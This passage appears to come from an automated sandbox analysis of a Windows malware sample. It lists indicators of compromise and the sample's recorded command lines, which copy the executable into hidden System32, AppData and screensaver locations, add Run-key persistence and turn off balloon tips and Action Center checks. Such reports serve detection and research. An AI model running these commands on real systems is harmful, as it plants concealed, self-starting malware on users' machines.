pid Process 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 3852 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3908 iexplore.exe 3908 iexplore.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3908 iexplore.exe 3908 iexplore.exe 516 IEXPLORE.EXE 516 IEXPLORE.EXE 516 IEXPLORE.EXE 516 IEXPLORE.EXE 3908 iexplore.exe 3908 iexplore.exe 548 IEXPLORE.EXE 548 IEXPLORE.EXE 548 IEXPLORE.EXE 548 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4036 wrote to memory of 3536 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 85 PID 4036 wrote to memory of 3536 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 85 PID 4036 wrote to memory of 3536 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 85 PID 4036 wrote to memory of 4488 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 86 PID 4036 wrote to memory of 4488 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 86 PID 4036 wrote to memory of 4488 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 86 PID 3536 wrote to memory of 3996 3536 cmd.exe 89 PID 3536 wrote to memory of 3996 3536 cmd.exe 89 PID 3536 wrote to memory of 3996 3536 cmd.exe 89 PID 4488 wrote to memory of 1596 4488 cmd.exe 90 PID 4488 wrote to memory of 1596 4488 cmd.exe 90 PID 4488 wrote to memory of 1596 4488 cmd.exe 90 PID 4036 wrote to memory of 2316 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 95 PID 4036 wrote to memory of 2316 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 95 PID 4036 wrote to memory of 2316 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 95 PID 4036 wrote to memory of 4964 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 97 PID 4036 wrote to memory of 4964 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 97 PID 4036 wrote to memory of 4964 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 97 PID 4036 wrote to memory of 3972 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 99 PID 4036 wrote to memory of 3972 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 99 PID 4036 wrote to memory of 3972 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 99 PID 4036 wrote to memory of 3236 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 100 PID 4036 wrote to memory of 3236 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 100 PID 4036 wrote to memory of 3236 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 100 PID 4036 wrote to memory of 2332 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 103 PID 4036 wrote to memory of 2332 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 103 PID 4036 wrote to memory of 2332 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 103 PID 4036 wrote to memory of 5104 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 104 PID 4036 wrote to memory of 5104 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 104 PID 4036 wrote to memory of 5104 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 104 PID 4036 wrote to memory of 864 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 107 PID 4036 wrote to memory of 864 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 107 PID 4036 wrote to memory of 864 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 107 PID 4036 wrote to memory of 4428 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 108 PID 4036 wrote to memory of 4428 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 108 PID 4036 wrote to memory of 4428 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 108 PID 4036 wrote to memory of 3744 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 111 PID 4036 wrote to memory of 3744 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 111 PID 4036 wrote to memory of 3744 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 111 PID 4036 wrote to memory of 3368 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 112 PID 4036 wrote to memory of 3368 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 112 PID 4036 wrote to memory of 3368 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 112 PID 3972 wrote to memory of 1412 3972 cmd.exe 115 PID 3972 wrote to memory of 1412 3972 cmd.exe 115 PID 3972 wrote to memory of 1412 3972 cmd.exe 115 PID 3236 wrote to memory of 4896 3236 cmd.exe 116 PID 3236 wrote to memory of 4896 3236 cmd.exe 116 PID 3236 wrote to memory of 4896 3236 cmd.exe 116 PID 5104 wrote to memory of 3868 5104 cmd.exe 117 PID 5104 wrote to memory of 3868 5104 cmd.exe 117 PID 5104 wrote to memory of 3868 5104 cmd.exe 117 PID 4036 wrote to memory of 4760 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 126 PID 4036 wrote to memory of 4760 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 126 PID 4036 wrote to memory of 4760 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 126 PID 4760 wrote to memory of 4008 4760 cmd.exe 128 PID 4760 wrote to memory of 4008 4760 cmd.exe 128 PID 4760 wrote to memory of 4008 4760 cmd.exe 128 PID 4036 wrote to memory of 2996 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 129 PID 4036 wrote to memory of 2996 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 129 PID 4036 wrote to memory of 2996 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 129 PID 4036 wrote to memory of 1504 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 131 PID 4036 wrote to memory of 1504 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 131 PID 4036 wrote to memory of 1504 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 131 PID 4036 wrote to memory of 856 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 133 -
Views/modifies file attributes 1 TTPs 20 IoCs
pid Process 1596 attrib.exe 2732 attrib.exe 1724 attrib.exe 2368 attrib.exe 4696 attrib.exe 3996 attrib.exe 3488 attrib.exe 532 attrib.exe 3388 attrib.exe 448 attrib.exe 4540 attrib.exe 4008 attrib.exe 4608 attrib.exe 4764 attrib.exe 636 attrib.exe 3680 attrib.exe 3104 attrib.exe 2548 attrib.exe 1164 attrib.exe 3288 attrib.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2656
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:2808
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3636
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3836
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3924
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3988
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4072
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3608
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca1⤵PID:1320
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4168
-
C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "%appdata%\daemon.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Windows\SysWOW64\attrib.exeattrib -R -H "C:\Users\Admin\AppData\Roaming\daemon.exe"3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3996
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "%windir%\system32sysrunc.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\SysWOW64\attrib.exeattrib -R -H "C:\Windows\system32sysrunc.exe"3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rename "%appdata%\daemon.exe" "trash1.dat"2⤵
- System Location Discovery: System Language Discovery
PID:2316
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rename "%windir%\system32\sysrunc.exe" "trash2.dat"2⤵PID:4964
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f3⤵PID:1412
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f3⤵PID:4896
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\plugininstall.bat"2⤵
- System Location Discovery: System Language Discovery
PID:2332
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software" /v "crc32" /t REG_SZ /d "Pxhnjpa4" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\software" /v "crc32" /t REG_SZ /d "Pxhnjpa4" /f3⤵
- System Location Discovery: System Language Discovery
PID:3868
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c del "%appdata%\trash1.dat"2⤵PID:864
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c del "%windir%\system32\trash2.dat"2⤵
- System Location Discovery: System Language Discovery
PID:4428
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c del /s /f "%appdata%\trash1.dat"2⤵
- System Location Discovery: System Language Discovery
PID:3744
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c del /s /f "%windir%\system32\trash2.dat"2⤵
- System Location Discovery: System Language Discovery
PID:3368
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\daemon.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\daemon.exe"3⤵
- Views/modifies file attributes
PID:4008
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%appdata%\daemon.exe"2⤵PID:2996
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\daemon.exe"2⤵PID:1504
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\daemon.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:636
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "daemon" /t REG_SZ /d "%appdata%\daemon.exe" /f2⤵PID:856
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "daemon" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\daemon.exe" /f3⤵
- Adds Run key to start application
PID:2044
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\sysrunc.exe"2⤵PID:4772
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Windows\system32\sysrunc.exe"3⤵
- Views/modifies file attributes
PID:3488
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%windir%\system32\sysrunc.exe"2⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:3748
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\sysrunc.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4416 -
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Windows\system32\sysrunc.exe"3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:532
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\software\microsoft\windows\currentversion\run" /v "sysrunc" /t REG_SZ /d "%windir%\system32\sysrunc.exe" /f2⤵PID:2340
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\software\microsoft\windows\currentversion\run" /v "sysrunc" /t REG_SZ /d "C:\Windows\system32\sysrunc.exe" /f3⤵
- Adds Run key to start application
PID:3772
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows2⤵
- System Location Discovery: System Language Discovery
PID:4540
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\3dtext.scr"2⤵PID:780
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr"3⤵
- Views/modifies file attributes
PID:3388
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%appdata%\Microsoft\Windows\3dtext.scr"2⤵PID:1120
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\3dtext.scr"2⤵PID:3944
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3680
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\3dtext.scr" /f2⤵PID:2668
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr" /f3⤵
- System Location Discovery: System Language Discovery
PID:1192
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f2⤵PID:940
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f3⤵PID:2564
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f2⤵PID:1420
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f3⤵
- System Location Discovery: System Language Discovery
PID:1676
-
-
-
C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe"2⤵
- Checks computer location settings
- Loads dropped DLL
- Adds Run key to start application
- Drops autorun.inf file
- Modifies Control Panel
- Suspicious behavior: GetForegroundWindowSpam
PID:3852 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c del "%appdata%\trash1.dat"3⤵PID:916
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c del "%windir%\system32\trash2.dat"3⤵PID:1616
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c del /s /f "%appdata%\trash1.dat"3⤵PID:4000
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c del /s /f "%windir%\system32\trash2.dat"3⤵PID:4152
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\daemon.exe"3⤵
- System Location Discovery: System Language Discovery
PID:856 -
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\daemon.exe"4⤵
- Views/modifies file attributes
PID:3104
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%appdata%\daemon.exe"3⤵PID:728
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\daemon.exe"3⤵PID:2388
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\daemon.exe"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2548
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "daemon" /t REG_SZ /d "%appdata%\daemon.exe" /f3⤵
- System Location Discovery: System Language Discovery
PID:652 -
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "daemon" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\daemon.exe" /f4⤵
- Adds Run key to start application
PID:2912
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\sysrunc.exe"3⤵PID:1176
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Windows\system32\sysrunc.exe"4⤵
- Drops file in System32 directory
- Views/modifies file attributes
PID:448
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%windir%\system32\sysrunc.exe"3⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:668
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\sysrunc.exe"3⤵PID:2148
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Windows\system32\sysrunc.exe"4⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:4540
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\software\microsoft\windows\currentversion\run" /v "sysrunc" /t REG_SZ /d "%windir%\system32\sysrunc.exe" /f3⤵
- System Location Discovery: System Language Discovery
PID:1684 -
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\software\microsoft\windows\currentversion\run" /v "sysrunc" /t REG_SZ /d "C:\Windows\system32\sysrunc.exe" /f4⤵
- Adds Run key to start application
PID:3568
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows3⤵PID:1948
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\3dtext.scr"3⤵PID:1892
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr"4⤵
- Views/modifies file attributes
PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%appdata%\Microsoft\Windows\3dtext.scr"3⤵PID:3436
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\3dtext.scr"3⤵PID:2712
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2368
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\3dtext.scr" /f3⤵PID:3632
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr" /f4⤵PID:4476
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f3⤵PID:1668
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f4⤵
- System Location Discovery: System Language Discovery
PID:3700
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f3⤵PID:1200
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f4⤵PID:4160
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"3⤵PID:4056
-
-
